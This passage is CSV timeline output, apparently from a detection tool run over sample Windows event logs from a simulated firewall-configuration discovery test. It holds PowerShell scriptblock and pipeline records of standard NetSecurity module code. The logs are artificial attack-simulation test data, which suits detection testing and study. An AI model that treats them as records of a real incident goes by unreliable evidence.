[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletiza",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tion_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvoca",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tionInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 